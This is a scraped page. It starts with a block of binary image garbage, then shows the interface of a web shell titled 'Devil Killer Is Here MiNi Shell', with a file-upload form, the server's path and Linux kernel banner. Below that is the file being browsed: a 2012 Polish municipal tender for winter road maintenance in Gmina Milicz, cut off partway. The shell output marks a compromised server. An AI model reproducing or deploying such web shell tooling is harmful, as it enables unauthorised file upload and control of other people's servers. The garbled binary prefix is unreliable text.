JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121116/455236-N-2012.html

<p class="kh_header"><b>Milicz: Zimowe utrzymanie dróg, placów, parkingów, alejek parkowych i ciągów pieszych Gminy Milicz</b><br>
<b>Numer ogłoszenia: 455236 - 2012; data zamieszczenia: 16.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Milicz , ul. Trzebnicka 2, 56-300 Milicz, woj. dolnośląskie, tel. 071 3840004 w. 314, faks 071 3841119.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.milicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg, placów, parkingów, alejek parkowych i ciągów pieszych Gminy Milicz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZIMOWE UTRZYMANIE DRÓG, PLACÓW, PARKINGÓW, ALEJEK PARKOWYCH I CIĄGÓW PIESZYCH GMINY MILICZ.
Przedmiotem zamówienia jest zimowe utrzymanie dróg, placów, parkingów, alejek parkowych i ciągów pieszych Gminy Milicz zwane dalej Akcją Zima 2012/2013 na terenie Gminy Milicz polegające na odśnieżaniu, zwalczaniu i usuwaniu gołoledzi, w przypadkach zaistnienia takiej konieczności.
Teren objęty zamówieniem został podzielony na 11 niezależnych obwodów:
Obwód nr 1 - teren miasta Milicza
Obwód nr 2 - tereny wiejskie
Obwód nr 3 - sołectwo Gądkowice
Obwód nr 4 - sołectwo Godnowa
Obwód nr 5- sołectwo Gogołowice
Obwód nr 6 - sołectwo Olsza
Obwód nr 7 - sołectwo Pracze
Obwód nr 8 - sołectwo Wodników Górny
Obwód nr 9 - sołectwo Ruda Sułowska
Obwód nr 10 - sołectwo Nowy Zamek
Obwód nr 11 - sołectwo Wrocławice
Wykonawca przystępujący do przetargu może złożyć ofertę na dowolnie wybraną ilość Obwodów (Części 1-11 przedmiotowego zadania)
Zamawiający wybierze  najkorzystniejszą ofertę w ramach każdej z  11 Części zamówienia osobno.
Poszczególne części zamówienia zostały oznaczone w następujący sposób:
- Część 1 - Obwód 1 teren miasta Milicza,
-Część 2 - Obwód 2 tereny wiejskie
-Część 3 - Obwód 3 sołectwo Gądkowice
-Część 4 - Obwód 4 sołectwo Godnowa
-Część 5 - Obwód 5 sołectwo Gogołowice
- Część 6 - Obwód 6 sołectwo Olsza
-Część 7 - Obwód 7 sołectwo Pracze
-Część 8 - Obwód 8 sołectwo Wodników Górny
-Część 9 - Obwód 9 sołectwo Ruda Sułowska
- Część 10 - Obwód 10 sołectwo Nowy Zamek
- Część 11 - Obwód 11 sołectwo Wrocławice
Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia.
1.Zakres prac:
1)Zimowe utrzymanie dróg gminnych na terenie Gminy Milicz polega na:
-usuwaniu z jezdni śniegu, zasp, błota pośniegowego i języków śniegowych,
- likwidowaniu śliskości powstałej na skutek gołoledzi, śniegu, szadzi, szronu i lodowicy to znaczy odśnieżaniu i posypywaniu mieszanką piaskowo-solną dróg, placów, parkingów, alejek parkowych i ciągów pieszych ze szczególnym uwzględnieniem zejść do przejść dla pieszych zgodnie z opracowanym planem Akcji Zima (wykazem dróg),
- zgromadzeniu we własnym zakresie i na własny koszt odpowiednich ilości środków tj. 15% mieszanki piaskowo-solnej dla sprawnego przeprowadzenia Akcji Zima, wg potrzeb, zarówno w dni robocze, jak też w dni wolne od pracy w sezonie zimowym 2012/2013.
-Wykonawca jest zobowiązany do podania miejsca składowania mieszanki w celu sprawdzenia ilości i jakości
2)Zamówienie obejmuje wywozu śniegu i błota pośniegowego z granic pasa drogowego w szczególnie uzasadnionych przypadkach (każdorazowo określonych przez Zamawiającego). 
3)Szacunkowe ilości dla Części 1 wynoszą: 
a)170 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania - WARIANT I podawane w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
b)237 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania z posypywaniem - WARIANT II podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
c)181 m3 pomnożoną  przez cenę jednostkową za 1 m3 wywiezionego śniegu - WARIANT III podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
4)Szacunkowe ilości dla Części 2 wynoszą:
a) 284 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania - WARIANT I podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
b)175 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania z posypywaniem - WARIANT II, podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę;
5)Wykonawca zobowiązany jest do stałego współdziałania z Zakładem Usług Komunalnych w Miliczu koordynującym Części nr 1 i 2 Akcji Zima. 
6)Raporty pracy dziennej dotyczące Części nr 1 i 2 winny być zgłaszane codziennie u kierującego Akcją Zima w siedzibie Zakładu Usług Komunalnych w Miliczu ul Osiedle 35, 56-300 Milicz, w godzinach pracy tj. od 7.00 do 15.00. 
7)Wykonawca zobowiązany jest do stałego współdziałania  w przypadku Części nr 3, 4, 5, 6, 7, 8, 9, 10, 11 z sołtysami poszczególnych wiosek a w szczególności:
-Wykonawca przystąpi do wykonywania przedmiotu umowy niezwłocznie po telefonicznym wezwaniu przez Sołtysa lub samoistnie, niezwłocznie (telefonicznie) zawiadamiając o powyższym Sołtysa. 
-Podstawą ustalenia ilości godzin wykonywania przedmiotu umowy jest zatwierdzona przez Sołtysa dzienna ewidencja wykonanych usług prowadzona przez Wykonawcę według wzoru określonego w Załączniku nr 4  do niniejszej umowy.
-Wykonawca przedłoży Sołtysowi do zatwierdzenia dzienną ewidencję wykonanych usług nie później niż w ciągu 2 dni od dnia realizacji przedmiotu umowy w danym dniu.  Sołtys potwierdza wykonanie przedmiotu umowy na ewidencji.
- Wynagrodzenia Wykonawcy płatne jest miesięcznie z dołu, na podstawie wszystkich zatwierdzonych przez Sołtysa w tym miesiącu dziennych ewidencji czasu pracy,
Szacunkowe ilości godzin odśnieżania dla Części 3-11 wynoszą odpowiednio:
Części	Ogółem
3 -Gądkowice -73 h
4- Godnowa - 56h
5 - Gogołowice -58 h
6- Olsza -21h
7- Pracze -76h
8- Wodników Górny -39h 
9- Ruda Sułowska	 - 23h
10 - Nowy Zamek -80h
11-Wrocławice -97h pomnożone przez cenę jednostkową za 1 godzinę odśnieżania ramach każdej z Części 3-11    (w przypadku Części 10 z posypywaniem) podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę.
 2.Standard utrzymania dróg:
Przyjmuje się następujące standardy zimowego utrzymania dróg Gminy Milicz dla Części nr 1 i Części nr 2 (zgodnie z zarządzeniem nr 46 Ministra Transportu i Gospodarki Morskiej z dnia 24 października 1994r. w sprawie zasad odśnieżania i usuwania gołoledzi na drogach publicznych - Dziennik Urzędowy MTiGM z 25.10.1994 Nr 10, poz.  20) :
-GRUPA 1 standard IV
- skrzyżowania z drogą krajową ulic: Powstańców  Wielkopolskich, Akacjowej, Grota Roweckiego
-ulice: Kopernika, Mickiewicza, Grzybowa, Ks. Waresiaka, pl. Ks. Waresiaka, Wrocławska, 1-go Maja, Garncarska, Szewska (do Krotoszyńskiej), Kościuszki, Grunwaldzka, Armii Krajowej, 11 - tego Listopada, Grota Roweckiego
-GRUPA 2 standard V
- pozostałe  utwardzone (bitumiczne lub z kostki brukowej) ulice i drogi gminne. 
- GRUPA 3 standard VI - drogi gminne gruntowe- włącznie dojazdy do zabudowań

Przyjmuje się następujące standardy zimowego utrzymania dróg Gminy Milicz dla Części nr 3, 4, 5, 6, 7, 8, 9, 11:
-w obrębie wsi lub zwartej zabudowie mieszkaniowej jezdnia odśnieżona na całej szerokości. Dopuszcza się odstępstwa po ustaniu opadów śniegu:
		a) śnieg luźny  do 4 h,
		b) zajeżdżony - występuje,
		c) zaspy do 4h,
- w pozostałych przypadkach odśnieżony co najmniej jeden pas ruchu z wykonaniem mijanek. Dopuszcza się odstępstwa po ustaniu opadów śniegu:
		a) śnieg luźny - do 8 h,
		b) zajeżdżony - występuje,
		c) nabój śnieżny ( nieusunięta, zlodowaciała lub ubita warstwa śniegu o 
                znacznej grubości, przymarznięta do nawierzchni jezdni) - występuje,
               d) zaspy - do 8h.

Przyjmuje się następujące standardy zimowego utrzymania dróg Gminy Milicz dla  Części nr 10:
-w obrębie wsi lub zwartej zabudowie mieszkaniowej jezdnia odśnieżona na całej szerokości. Dopuszcza się odstępstwa po ustaniu opadów śniegu:
		a) śnieg luźny  do 4 h,
		b) zajeżdżony - występuje,
		c) zaspy do 4h,
	d) posypywanie nawierzchni jezdni piaskiem lub mieszanka soli z piaskiem odbywać się będzie w miejscach oznaczonych w załączniku nr 2 do umowy
-W pozostałych przypadkach odśnieżony co najmniej jeden pas ruchu z wykonaniem mijanek. Dopuszcza się odstępstwa po ustaniu opadów śniegu:
	a) śnieg luźny - do 8 h,
	b) zajeżdżony - występuje,
	c) nabój śnieżny (nieusunięta, zlodowaciała lub ubita warstwa śniegu 
	o znacznej grubości, przymarznięta do nawierzchni jezdni) - występuje,
	d) zaspy - do 8h.
Zasady odśnieżania i usuwania śliskości poszczególnych standardów dróg zgodnie z zarządzeniem nr 10 Ministra Transportu i Gospodarki Morskiej (Dziennik Urzędowy MTiGM z 25.10.1994 Nr 46,  poz. 20)
Dopuszczalne odstępstwa od standardu
Standard Opis stanu utrzymania drogi po ustaniu opadów śniegu	od stwierdzenia występowania zjawisk.
IV.Jezdnia odśnieżona na całej szerokości,
posypana na odcinkach decydujących o możliwości ruchu	-luźny - 8 godz.
-zajeżdżony - występuje
-języki śnieżne -występują
-zaspy - do 8 godz.
Dopuszcza się przerwy w komunikacji do 8 godz.	W miejscach wyznaczonych
-gołoledź - 8 godz.
-pośniegowa - 10 godz.
-lodowica -8 godz.
V.Jezdni odśnieżona . W miejscach zasp.
Odśnieżony co najmniej  jeden pas ruchu z wykonaniem mijanek. Jezdnia posypana na odcinkach decydujących o możliwości ruchu	-luźny- 16 godz.
-zajeżdżony - występuje
-nabój śnieżny -  występuje
-zaspy - występują do 24 godz.
Dopuszcza się przerwy w komunikacji do 24 godz.	W miejscach wyznaczonych
-gołoledż-8 godz.
- pośniegowa
VI.Jezdnia zaśnieżona
prowadzi się interwencyjne odśnieżanie w zależności od potrzeb.

Jezdnia posypana w miejscach wyznaczonych przez zarząd drogi	-luźny -występuje
-zajeżdżony - występuje
-nabój śnieżny - występuje
zaspy - występuje do 48 godz.	W miejscach wyznaczonych
-wszystkie rodzaje śliskości po odśnieżaniu 
- 2 godz.

Likwidacja śliskości  przez posypywanie  nawierzchni mieszanką piasku z solą dotyczy jedynie dróg  utwardzonych a miejsca wyznaczone to;
- skrzyżowania z innymi drogami
 - skrzyżowania z koleją
 - odcinki pochylone pow. 4 %
 - przystanki autobusowe
1)	Niezbędny sprzęt:
Praca sprzętu wymienionego w punkcie 6.3.1 Specyfikacji Istotnych Warunków Zamówienia odbywać się będzie na wezwanie.

2)	Technika odśnieżania dróg:

1)	Technika odśnieżania dróg zależy od:
5)	szerokości jezdni i przyjętej na niej organizacji drogi,
6)	przyjętego dla danej drogi standardu odśnieżania,
7)	rodzaju użytych do odśnieżania pługów.

1)	CZĘŚCI ZAMÓWIENIA

Zamawiający dopuszcza składanie ofert częściowych. Liczba Części  - 11.

1.	Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania oraz posypywania - wg wykazu dla terenu miasta Milicz - Część 1, Obwód 1:

Drogi gminne w Miliczu:
Nazwa ulicy	długość ulicy w km
1 Maja, Wrocławska, Waresiaka	- 0,850
Grota Roweckiego - 	0,787
Kościuszki	 - 0,932
Krótka	- 0,180
11 listopada - 0,215
Armii Krajowej - 0,300
Poprzeczna	- 1,058
Wesoła - 0,500
Grunwaldzka - 0,442
Dworcowa	- 0,120
Grzybowa	- 1,080
Dębowa - 0,558
Kasztanowa - 0,482
Kopernika - 0,785
Kombatantów - 0,577
Mickiewicza	- 0,541
Akacjowa - 0,576
Powstańców Wielkopolskich - 1,617
Garncarska - 0,113
Mostowa -0,256
Budowlana - 0,251
Osadnicza - 0,746
Szewska - 0,130
Rynek	 - 0,180
Działkowa - 0,336
Kuźnicza  - 0,160
Łąkowa  - 0,088
Krotoszyńska  - 0,037
Długa	 -0,211
Osiedle - 0,466
Rzeczna	- 0,139
Sycowska -	0,569
Topolowa - 0,468
Wiśniowa - 0,110
Spółdzielcza - 0,532
Odrodzenia	- 0,207
Krzywa -0,466
Lwowska -0,102
Polska - 0,072
Kościelna -	0,238
Piaskowa - 0,174
Jasna	- 0,203
Pułaskiego	 - 0,272
Polna -0,232
Wodociągowa -0,304
Kamienna - 0,090
Magazynowa - 0,133
Krucza - 0,225
Aleja ZHP	- 0,250
Czereśniowa - 0,099
Klonowa - 0,152
Wierzbowa - 0,269
Świerkowa - 0,192
Modrzewiowa - 0,280
Brzozowa - 0,210
Jaworowa - 0,165
Ogrodowa -0,296
Poziomkowa	 - 0,09
Nowowiejska - 0,210
Zielona - 0,425
Rzemieślnicza	 - 0,106
Lotnicza - 0,106
Pszczela - 0,212
Miodowa - 0,144
Wałowa	- 0,110
Zamkowa - 0,180
Nektarowa	- 0,152
Kwiatowa - 0,101
Dojazdowa - 0,553
Słoneczna - 0,146
Dąbrowskiego - 0,844
Końcowa - 0,086
Okrężna -	0,160
Przemysłowa -0,466
Stawna - 0,395
Razem - 25,509

2.Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania oraz posypywania - wg wykazu dla terenów wiejskich - Część 2 (Obwód 2): Drogi gminne wiejskie:

Miejscowość	długość dróg w km
Baranowice	 - 1,9
Bartniki	 - 2,3
Brzezina Sułowska - 2,425
Czatkowice	- 0,915
Duchowo -1,05
Dunkowa - 1,52
Grabownica -0,27
Grabówka - 0,405
Gruszeczka -1,845
Henrykowice -1,9
Kaszowo - 	3
Kolęda - 0,5
Latkowa	- 4
Łąki	- 1,39
Miłochowice - 2,19
Miłosławice -0,93
Młodzianów - 0,46
Niesułowice	- 1,4
Ostrowąsy -1,3
Piękocin - 2,15
Piotrkosice - 0,55
Potasznia - 4,04
Poradów - 0,22
Postolin - 2,3
Ruda Milicka -0,86
Sławoszowice -1,967
Słączno	- 1,47
Stawiec- 0,81
Sulimierz -0,87
Sułów	 - 5,434
Świętoszyn - 1,3
Tworzymirki Górne - 0,75
Węgrzynów	- 1,725
Wielgie Milickie - 0,525
Wróbliniec -	0,8
Wszewilki	- 4,75
Wziąchowo Małe	-0,25
Wziąchowo Wielkie -	1,07
Razem	-     57,941
3. Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania - wg wykazu dla sołectwa Gądkowice - Część 3 (Obwód 3)  długość dróg - 2,060 km.
4. Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania - wg wykazu dla sołectwa Godnowa - Część 4 (Obwód 4) długość dróg - 1,810 km.
5.Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania- wg wykazu dla sołectwa Gogołowice - Część 5 (Obwód 5) długość dróg - 2,030 km.
6.Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania - wg wykazu dla sołectwa Olsza - Część 6 (Obwód 6) długość dróg - 0,686 km.
7.Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania - wg wykazu dla sołectwa Pracze - Część 7 (Obwód 7)długość dróg - 1,7 km;
8.Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania - wg wykazu dla sołectwa Wodników Górny - Część 8 (Obwód 8)  długość dróg - 1,1 km;
9.Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania - wg wykazu dla sołectwa Ruda Sułowska - Część 9 (Obwód 9) długość dróg - 0,614 km.
10.Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania- wg wykazu dla sołectwa Nowy Zamek - Część 10 (Obwód 10) długość dróg - 4,263 km  do posypywania  1,196 km; 
11.	Wykaz dróg gminnych oraz będących w zarządzie Gminy Milicz przewidzianych do odśnieżania - wg wykazu dla sołectwa Wrocławice - Część 11 Obwód 11 długość dróg - 2,717 km.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 10% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 6  ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych. W przypadku zwiększenia zakresu wykonywanej usługi np. zwiększenia  długości tras (kilometrażu odśnieżania) w stosunku do zakresu obowiązującego w zamówieniu  podstawowym , Wykonawca, któremu zostanie udzielone zamówienie podstawowe zobowiązany będzie do zastosowania w zamówieniach uzupełniających (przy spełnieniu  pozostałych warunków obowiązujących w zamówieniu podstawowym) cen (brutto) za 1 km  odśnieżania nie wyższych niż zastosowanych w zamówieniu podstawowym.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż dysponuje niezbędnymi dla danej Części 1 -11 (na które Wykonawca składa ofertę) zamówienia jednostkami sprzętu:
CZĘŚĆ 1 (OBWÓD 1) TEREN MIASTA MILICZA:
- samochód ciężarowy do zwalczania śliskości zimowej z piaskarką 6-8 ton i pługiem średnim - 1 sztuka;
- ciągnik o mocy min.80 KM z pługiem i rozrzutnikiem - 1 sztuka;
- równiarka samojezdna - 1 sztuka;
- ładowarka- 1 sztuka;
- ciągnik z pługiem i rozrzutnikiem do odśnieżania i zwalczania śliskości na chodnikach - 1 sztuka.
CZĘŚĆ 2 - OBWÓD 2 TERENY WIEJSKIE:
- samochód ciężarowy do zwalczania śliskości zimowej z piaskarką 6-8 ton i pługiem średnim - 1 sztuka,
- ciągnik o mocy min.80 KM z pługiem i rozrzutnikiem - 2 sztuki,
- równiarka samojezdna - 1 sztuka,
- ładowarka- 1 sztuka;
Część 3 - Obwód 3 sołectwo Gądkowice - pojazd przystosowany do odśnieżania  - 1 sztuka;
Część 4 - Obwód 4 sołectwo Godnowa - pojazd przystosowany do odśnieżania  - 1 sztuka;
Część 5- Obwód 5 sołectwo Gogołowice - pojazd przystosowany do odśnieżania   - 1 sztuka;
Część 6 - Obwód 6 sołectwo Olsza - pojazd przystosowany do odśnieżania  - 1 sztuka;
Część 7 - Obwód 7 sołectwo Pracze - pojazd przystosowany do odśnieżania  - 1 sztuka;
Część 8 - Obwód 8 sołectwo Wodników Górny - pojazd przystosowany do odśnieżania   - 1 sztuka;
Część 9 - Obwód 9 sołectwo Ruda Sułowska - pojazd przystosowany do odśnieżania   - 1 sztuka;
Część 10 - Obwód 10 sołectwo Nowy Zamek - pojazd przystosowany do odśnieżania    - 1 sztuka;
Część 11 - Obwód 11 sołectwo Wrocławice - pojazd przystosowany do odśnieżania   - 1 sztuka.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

